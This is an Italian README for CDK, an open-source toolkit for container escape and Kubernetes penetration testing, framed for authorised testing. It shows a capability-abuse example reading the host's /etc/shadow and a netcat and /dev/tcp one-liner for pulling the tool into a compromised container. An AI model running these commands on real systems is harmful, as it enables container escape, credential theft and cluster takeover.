
📦 Rendi più facile il test di sicurezza di K8s, Docker e Containerd.
Inglese | 简体中文

L'uso di CDK per attaccare bersagli senza previo consenso reciproco è illegale. CDK è destinato esclusivamente a scopi di test di sicurezza.
CDK è un toolkit di penetrazione per container open-source, progettato per offrire sfruttamento stabile in diversi container snelli senza alcuna dipendenza dal sistema operativo. Viene fornito con utili net-tools e molti potenti PoC/EXP e ti aiuta a fuggire dal container e a prendere il controllo del cluster K8s facilmente.
Esegui cdk eva per ottenere informazioni di valutazione e un exploit raccomandato, quindi esegui cdk run per avviare l'attacco.
> ./cdk eva --full
[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.
> ./cdk run cap-dac-read-search
Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::
Scarica l'ultima release da https://github.com/cdk-team/CDK/releases/
Inserisci i file eseguibili nel container di destinazione e inizia i test.
Se hai un exploit che può caricare un file, allora puoi caricare direttamente il binario di CDK.
Se hai un exploit RCE, ma il container di destinazione non ha curl o wget, puoi utilizzare il seguente metodo per consegnare CDK:
(on your host)
nc -lvp 999 < cdk
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk
Usage:
cdk evaluate [--full]
cdk run (--list | <exploit> [<args>...])
cdk <tool> [<args>...]
Evaluate:
cdk evaluate Gather information to find weakness inside container.
cdk evaluate --full Enable file scan during information gathering.
Exploit:
cdk run --list List all available exploits.
cdk run <exploit> [<args>...] Run single exploit, docs in https://github.com/cdk-team/CDK/wiki
Tool:
vi <file> Edit files in container like "vi" command.
ps Show process information like "ps -ef" command.
nc [options] Create TCP tunnel.
ifconfig Show network information.
kcurl <path> (get|post) <uri> <data> Make request to K8s api-server.
ectl <endpoint> get <key> Unauthorized enumeration of ectd keys.
ucurl (get|post) <socket> <uri> <data> Make request to docker unix socket.
probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000
Options:
-h --help Show this help msg.
-v --version Show version.
--profile=<name> Select evaluation profile.
CDK ha tre moduli:
Utilizzo
cdk evaluate [--full]
| Tattiche | Script | Supportato | Utilizzo/Esempio |
|---|---|---|---|
| Raccolta Informazioni | Informazioni Base del SO | ✔ | link |
| Raccolta Informazioni | Capacità Disponibili | ✔ | link |
| Raccolta Informazioni | Comandi Linux Disponibili | ✔ | link |
| Raccolta Informazioni | Mount | ✔ | link |
| Raccolta Informazioni | Namespace di Rete | ✔ | link |
| Raccolta Informazioni | ENV Sensibili | ✔ | link |
| Raccolta Informazioni | Processi Sensibili | ✔ | link |
| Raccolta Informazioni | File Locali Sensibili | ✔ | link |
| Raccolta Informazioni | Kube-proxy Route Localnet (CVE-2020-8558) | ✔ | link |
| Raccolta Informazioni | Scoperta Servizi Basata su DNS | ✔ | link |
| Scoperta | Informazioni API Server K8s | ✔ | link |
| Scoperta | Informazioni Service Account K8s | ✔ | link |
| Scoperta | API Metadata del Provider Cloud | ✔ | link |
Elenca tutti gli exploit disponibili:
cdk run --list
Esegui exploit mirato:
cdk run <script-name> [options]